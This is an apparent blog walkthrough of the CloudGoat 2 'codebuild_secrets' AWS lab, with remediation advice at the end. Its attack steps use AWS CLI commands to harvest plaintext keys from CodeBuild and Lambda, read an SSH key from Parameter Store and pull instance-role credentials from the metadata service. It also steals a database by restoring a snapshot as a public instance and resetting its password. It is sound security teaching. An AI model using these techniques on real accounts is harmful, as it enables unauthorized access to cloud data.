This is the final part of a five-part series exploring CloudGoat 2, a “vulnerable by design” AWS deployment tool from Rhino Security Labs. It is a great resource for learning how to perform pen tests on AWS environments and, by extension, how to defend your own accounts against the same issues.

You can read the earlier posts here, here, here, and here. This particular scenario deploys a CodeBuild project and Lambda function alongside an EC2 instance, two IAM users, and an RDS instance. That suggests it will focus more on serverless attack vectors, which is great and something I’ve written about before. The summary for this scenario is:

Starting as the IAM user Solo, the attacker first enumerates and explores CodeBuild projects, finding unsecured IAM keys for the IAM user Calrissian therein. Then operating as Calrissian, the attacker discovers an RDS database. Unable to access the database’s contents directly, the attacker can make clever use of the RDS snapshot functionality to acquire the scenario’s goal: a pair of secret strings.

Alternatively, the attacker may explore SSM parameters and find SSH keys to an EC2 instance. Using the metadata service, the attacker can acquire the EC2 instance-profile’s keys and push deeper into the target environment, eventually gaining access to the original database and the scenario goal inside (a pair of secret strings) by a more circuitous route.

The scenario’s goal is to retrieve a pair of secret strings stored in a secure RDS database.

Exploit - Solo

We’ll start in exactly the same way as the other scenarios, by deploying the scenario and then exporting the credentials we find in start.txt for the IAM user Solo.

./cloudgoat.py create codebuild_secrets

export AWS_ACCESS_KEY_ID=AKIA...

export AWS_SECRET_ACCESS_KEY=IXiTd...

Starting with the IAM user Solo, let’s see if we have any CodeBuild Projects, since the name of the scenario implies that there will be at least one in the environment.

aws codebuild list-projects --sort-by NAME --region us-east-1

This command returns a single project - cg-codebuild-cgidc6p7ny7ey5, which we’ll explore to see if we can get more information.

aws codebuild batch-get-projects --names cg-codebuild-cgidc6p7ny7ey5 --region us-east-1

The output from this command gives us an early win, revealing another IAM user’s keys being stored as environment variables in plain text:

"environment": {
    "type": "LINUX_CONTAINER",
    "image": "aws/codebuild/standard:1.0",
    "computeType": "BUILD_GENERAL1_SMALL",
    "environmentVariables": [
        {
            "name": "calrissian-aws-access-key",
            "value": "AKIAWRT3VKZYEKQGUBTM",
            "type": "PLAINTEXT"
        },
        {
            "name": "calrissian-aws-secret-key",
            "value": "UL7TapHhaMbUyGu9C2nEzIgHPeC3QRAZ/g7Ysmp+",
            "type": "PLAINTEXT"
        }
    ],
    "privilegedMode": false,
    "imagePullCredentialsType": "CODEBUILD"
}
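Spotting these by eye is easy with one project, but less so with dozens. As a rough sketch (not part of CloudGoat), the Python below scans the JSON returned by batch-get-projects for PLAINTEXT environment variables that look like secrets. The function name, the name patterns, and the access key regular expression are my own assumptions, so treat the matches as hints rather than proof.

```python
import re

# Assumption: access key IDs are 20 characters and start with AKIA (IAM user)
# or ASIA (temporary credentials).
ACCESS_KEY_ID = re.compile(r"^(AKIA|ASIA)[A-Z0-9]{16}$")
# Assumption: variable names containing these words are worth a closer look.
SUSPICIOUS_NAME = re.compile(r"(secret|password|passwd|token|access[-_]?key)", re.IGNORECASE)


def find_plaintext_secrets(batch_get_projects_output):
    """Return (project name, variable name) pairs that look like exposed secrets."""
    findings = []
    for project in batch_get_projects_output.get("projects", []):
        variables = project.get("environment", {}).get("environmentVariables", [])
        for var in variables:
            if var.get("type") != "PLAINTEXT":
                continue  # other types hold a reference, not the value itself
            if SUSPICIOUS_NAME.search(var["name"]) or ACCESS_KEY_ID.match(var["value"]):
                findings.append((project["name"], var["name"]))
    return findings
```

You could feed it the parsed output of the command above, for example with json.load on a saved copy of the response.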

We now have the credentials of another user, Calrissian, but before we explore those let’s see if we can get anything more of interest using Solo’s details.

aws ec2 describe-instances --region us-east-1

This reveals a single EC2 instance running Ubuntu. What we’ll do next is to enumerate the Security Group attached to the instance to discover the allowed ingress and egress traffic using the following command.

aws ec2 describe-security-groups --region us-east-1
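The response from this command can be long, so here is a minimal sketch of how you might filter it for rules that cover a given port. It assumes the usual describe-security-groups response shape (SecurityGroups, IpPermissions, IpRanges); the function name is hypothetical and it only looks at IPv4 ranges.

```python
def groups_allowing_port(describe_sg_output, port=22):
    """Return (group id, CIDR) pairs whose ingress rules cover the given TCP port."""
    matches = []
    for group in describe_sg_output.get("SecurityGroups", []):
        for rule in group.get("IpPermissions", []):
            protocol = rule.get("IpProtocol")
            if protocol == "-1":
                covers_port = True  # "-1" means all protocols and all ports
            elif protocol == "tcp":
                covers_port = rule.get("FromPort", 0) <= port <= rule.get("ToPort", 65535)
            else:
                covers_port = False
            if covers_port:
                for ip_range in rule.get("IpRanges", []):
                    matches.append((group["GroupId"], ip_range["CidrIp"]))
    return matches
```

A result containing 0.0.0.0/0 for port 22 means SSH is reachable from anywhere, provided you hold a valid key.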

From the output, it looks like port 22 is open, so if we had valid keys then we’d be able to connect to the instance. Where could we look for keys? In the previous scenario, we found a key pair in S3 so that’s unlikely to be the same here. Perhaps the developers have tried doing something more secure.

aws ssm describe-parameters --region us-east-1

Querying the AWS Systems Manager Parameter Store provides the following output:

{
    "Parameters": [
        {
            "Name": "cg-ec2-private-key-cgidc6p7ny7ey5",
            "Type": "String",
            "LastModifiedDate": 1561988192.732,
            "LastModifiedUser": "arn:aws:iam::123456789012:user/solo",
            "Description": "cg-ec2-private-key-cgidc6p7ny7ey5",
            "Version": 1,
            "Tier": "Standard",
            "Policies": []
        },
        {
            "Name": "cg-ec2-public-key-cgidc6p7ny7ey5",
            "Type": "String",
            "LastModifiedDate": 1561988192.718,
            "LastModifiedUser": "arn:aws:iam::123456789012:user/solo",
            "Description": "cg-ec2-public-key-cgidc6p7ny7ey5",
            "Version": 1,
            "Tier": "Standard",
            "Policies": []
        }
    ]
}
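The detail to notice in that output is the Type field: both parameters are String rather than SecureString. As a small sketch, the function below picks out parameters that are not SecureString and whose names hint at sensitive content. The name pattern and function name are my own guesses, so it will miss anything named less obviously.

```python
import re

# Assumption: these words in a parameter name suggest sensitive content.
KEY_LIKE_NAME = re.compile(r"(private[-_]?key|secret|password|token)", re.IGNORECASE)


def unencrypted_sensitive_parameters(describe_parameters_output):
    """Return names of parameters that look sensitive but are not SecureString."""
    names = []
    for param in describe_parameters_output.get("Parameters", []):
        if param.get("Type") != "SecureString" and KEY_LIKE_NAME.search(param["Name"]):
            names.append(param["Name"])
    return names
```

Run against the output above, this would flag the private key parameter and skip the public key one.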

It looks like we’ve hit the jackpot. Let’s see if we can grab the private key from the Parameter Store.

aws ssm get-parameter --name "cg-ec2-private-key-cgidc6p7ny7ey5" --region us-east-1

Success! The next logical step is to see if we can use the key with the instance we’ve already discovered. I’ve saved the private key to a file named thetestlabs just for clarity.

chmod 400 ./thetestlabs

ssh -i ./thetestlabs ubuntu@35.174.9.1

In the previous scenario, there was User Data attached to the instance, so let’s try that route here as well.

#!/bin/bash
apt-get update
apt-get install -y postgresql-client
psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidc6p7ny7ey5.csjmp4szzeby.us-east-1.rds.amazonaws.com:5432/securedb \
-c "CREATE TABLE sensitive_information (name VARCHAR(100) NOT NULL, value VARCHAR(100) NOT NULL);"
psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidc6p7ny7ey5.csjmp4szzeby.us-east-1.rds.amazonaws.com:5432/securedb \
-c "INSERT INTO sensitive_information (name,value) VALUES ('Key1','V\!C70RY-PvyOSDptpOVNX2JDS9K9jVetC1xI4gMO4');"
psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidc6p7ny7ey5.csjmp4szzeby.us-east-1.rds.amazonaws.com:5432/securedb \
-c "INSERT INTO sensitive_information (name,value) VALUES ('Key2','V\!C70RY-JpZFReKtvUiWuhyPGF20m4SDYJtOTxws6');"

The User Data already contains the pair of secret strings, which is the scenario’s goal. For completeness, though, we can also retrieve them directly from the database using the connection details that the User Data exposes in plain text.

psql postgresql://cgadmin:wagrrrrwwgahhhhwwwrrggawwwwwwrr@cg-rds-instance-cgidc6p7ny7ey5.csjmp4szzeby.us-east-1.rds.amazonaws.com:5432/securedb

\dt

select * from sensitive_information;

From the instance, we could have gone a different route:

sudo apt update && sudo apt install awscli

Querying the metadata on the instance, which we’ve done for other scenarios, confirms the role attached to the instance.

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2_role
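The metadata endpoint returns a JSON document containing AccessKeyId, SecretAccessKey, and Token fields. If you wanted to use those temporary credentials from another shell, a sketch like the following turns the response into export lines. The function name is hypothetical, and remember that role credentials also need the session token, unlike the IAM user keys we exported earlier.

```python
import json
import shlex


def credentials_to_exports(metadata_json):
    """Convert the metadata service credential document into shell export lines."""
    creds = json.loads(metadata_json)
    env = {
        "AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
        "AWS_SESSION_TOKEN": creds["Token"],  # required for temporary credentials
    }
    # shlex.quote protects any value that contains shell metacharacters
    return [f"export {name}={shlex.quote(value)}" for name, value in env.items()]
```

On the instance itself this step isn’t needed, since the AWS CLI picks up the role credentials automatically.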

aws lambda list-functions --region us-east-1 brings back a function called cg-lambda-cgidc6p7ny7ey5 with the following Environment Variables stored in plain text:

"Environment": {
    "Variables": {
        "DB_USER": "cgadmin",
        "DB_NAME": "securedb",
        "DB_PASSWORD": "wagrrrrwwgahhhhwwwrrggawwwwwwrr"
    }
}

Now that we have the credentials, we can get the details of the RDS instance using aws rds describe-db-instances --region us-east-1. With those details, we can get the secret strings in exactly the same way as we did above.
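To make that last step concrete, here is a minimal sketch that combines the Lambda environment variables with one entry from the DBInstances list returned by describe-db-instances to build a psql connection URL. The function name is my own; the Endpoint, Address, and Port keys are the ones the RDS response uses. The values are percent-encoded in case a password contains characters that are special in a URL.

```python
from urllib.parse import quote


def build_postgres_url(lambda_env, db_instance):
    """Build a postgresql:// URL from Lambda variables and an RDS instance entry."""
    user = quote(lambda_env["DB_USER"], safe="")
    password = quote(lambda_env["DB_PASSWORD"], safe="")
    database = quote(lambda_env["DB_NAME"], safe="")
    endpoint = db_instance["Endpoint"]
    return (
        f"postgresql://{user}:{password}"
        f"@{endpoint['Address']}:{endpoint['Port']}/{database}"
    )
```

The resulting string can be passed straight to psql, just like the URL we found in the User Data.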

Exploit - Calrissian

Let’s go back to the credentials that we discovered earlier in the CodeBuild project and see what attack routes we have using those. Once we’ve exported the credentials to the local environment, we can go straight ahead and start looking at the RDS instance.

aws rds describe-db-instances --region us-east-1

This returns the details for the RDS instance, but Calrissian has no permissions to access the database itself. If we have the right permissions, however, we could take a snapshot and launch a new RDS instance from it to get at the data.

aws rds create-db-snapshot --db-instance-identifier cg-rds-instance-cgidc6p7ny7ey5 --db-snapshot-identifier cloudgoat --region us-east-1

The command is successful, so the next step is to launch a new RDS instance using the snapshot. We’ll need to know the correct subnet group and security group first, so let’s look those up.

aws rds describe-db-subnet-groups --region us-east-1

{

"DBSubnetGroupName": "cloud-goat-rds-testing-subnet-group-cgidc6p7ny7ey5",

"DBSubnetGroupDescription": "CloudGoat cgidc6p7ny7ey5 Subnet Group ONLY for Testing with Public Subnets",

}

aws ec2 describe-security-groups --region us-east-1

We now have all of the information ready to launch a new RDS instance into the account using the snapshot that we’ve just created.

aws rds restore-db-instance-from-db-snapshot --db-instance-identifier thetestlabs --db-snapshot-identifier arn:aws:rds:us-east-1:123456789012:snapshot:cloudgoat --db-subnet-group-name cloud-goat-rds-testing-subnet-group-cgidc6p7ny7ey5 --publicly-accessible --vpc-security-group-ids sg-03e560eac95ddb273 --region us-east-1

Since we created the new RDS instance, we can reset its master password and then use that password to get the pair of secret strings from the database.

aws rds modify-db-instance --db-instance-identifier thetestlabs --master-user-password cloudgoat --region us-east-1
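The three RDS calls above have to run in order, and each one needs the previous step to finish first. As a sketch of the same flow in Python, the function below takes an RDS client (for example one created with boto3.client("rds", region_name="us-east-1"), which is an assumption about your tooling) and uses waiters between the steps. The function and parameter names are hypothetical, and the waiters rely on describe permissions that your user may or may not have.

```python
def restore_snapshot_with_new_password(rds, source_id, snapshot_id, new_id,
                                       subnet_group, security_group_ids, password):
    """Snapshot source_id, restore it as new_id, then reset the master password."""
    # Step 1: snapshot the database we cannot read directly
    rds.create_db_snapshot(
        DBInstanceIdentifier=source_id,
        DBSnapshotIdentifier=snapshot_id,
    )
    rds.get_waiter("db_snapshot_available").wait(DBSnapshotIdentifier=snapshot_id)

    # Step 2: restore the snapshot into a new, publicly accessible instance
    rds.restore_db_instance_from_db_snapshot(
        DBInstanceIdentifier=new_id,
        DBSnapshotIdentifier=snapshot_id,
        DBSubnetGroupName=subnet_group,
        PubliclyAccessible=True,
        VpcSecurityGroupIds=security_group_ids,
    )
    rds.get_waiter("db_instance_available").wait(DBInstanceIdentifier=new_id)

    # Step 3: set a master password we know on the restored copy
    rds.modify_db_instance(
        DBInstanceIdentifier=new_id,
        MasterUserPassword=password,
    )
```

Passing the client in as a parameter keeps the function easy to exercise with a stand-in object before pointing it at a real account.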





psql postgresql://cgadmin@thetestlabs.csjmp4szzeby.us-east-1.rds.amazonaws.com:5432/postgres

\l

\c securedb

select * from sensitive_information;

Summary and Remediation

In the final part of this series, we’ve used exposed keys to gather information about the account, then taken advantage of overly broad permissions and a lack of encryption to exploit it, including discovering further keys stored in a misconfigured CodeBuild project.

IAM permissions should be well thought out. The principle of least privilege is even more important in Cloud environments than in more traditional datacentres. Traditionally, Enterprises concentrated on securing the perimeter without really securing the internal network, which often led to admins having full access to multiple systems. In the Cloud, you need to switch your thinking to defense in depth.

This means that you need to think seriously about the permissions people have, and enforce complex passwords and MFA. You should also audit permissions regularly, looking for permissions that aren’t being used and removing them.
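One way to approach that audit is IAM’s service last accessed data. As a sketch, the function below takes the ServicesLastAccessed list from a get-service-last-accessed-details response and returns the services a principal has never used, or has not used recently. The 90-day threshold and the function name are arbitrary choices of mine, and it assumes the timestamps are timezone-aware datetimes.

```python
from datetime import datetime, timedelta, timezone


def unused_services(services_last_accessed, max_age_days=90, now=None):
    """Return service namespaces never used, or not used within max_age_days."""
    now = now or datetime.now(timezone.utc)
    cutoff = now - timedelta(days=max_age_days)
    unused = []
    for service in services_last_accessed:
        last_used = service.get("LastAuthenticated")  # missing if never used
        if last_used is None or last_used < cutoff:
            unused.append(service["ServiceNamespace"])
    return sorted(unused)
```

Anything this returns is a candidate for removal from the principal’s policies, after checking that it isn’t needed for something infrequent such as a yearly job.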

AWS provide multiple opportunities to encrypt data, but it is down to you to implement best practice. For example, in this scenario access keys were stored as plain-text environment variables in the CodeBuild project. There shouldn’t be any need for this - you should create an IAM role specifically for use with the CodeBuild project that has the minimum permissions required. If you absolutely need to reference access keys (and I genuinely can’t think of a good example), they should be stored as SecureString values in AWS Systems Manager Parameter Store.

AWS Systems Manager Parameter Store was used here to store the key pair for the EC2 instance as String values, rather than as SecureString values that would have been encrypted with KMS. The IAM user having access to the parameter is bad practice in itself. However, had the values been SecureString and the user had access to the parameter but not to the KMS key, they would not have been able to decrypt them.

Consider giving services permissions to access other services, rather than providing those permissions to IAM users. For example, if a Lambda function requires access to objects in S3, grant that access to the function’s execution role, and encrypt the S3 objects with a KMS key that only that role can use.
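As an illustration of that last point, the sketch below builds a single KMS key policy statement that lets one role decrypt with the key. The role ARN in the usage example is made up, and a real key policy would also need a statement that lets you administer the key, so treat this as a fragment rather than a complete policy.

```python
import json


def decrypt_only_statement(role_arn):
    """Build a key policy statement allowing only kms:Decrypt for one role."""
    return {
        "Sid": "AllowDecryptForFunctionRole",
        "Effect": "Allow",
        "Principal": {"AWS": role_arn},
        "Action": "kms:Decrypt",
        "Resource": "*",  # in a key policy, "*" refers to the key itself
    }


if __name__ == "__main__":
    # Hypothetical role ARN, for illustration only
    example = decrypt_only_statement("arn:aws:iam::123456789012:role/example-lambda-role")
    print(json.dumps(example, indent=2))
```

With a statement like this in place, and no IAM users granted use of the key elsewhere, reading the encrypted objects requires going through the role.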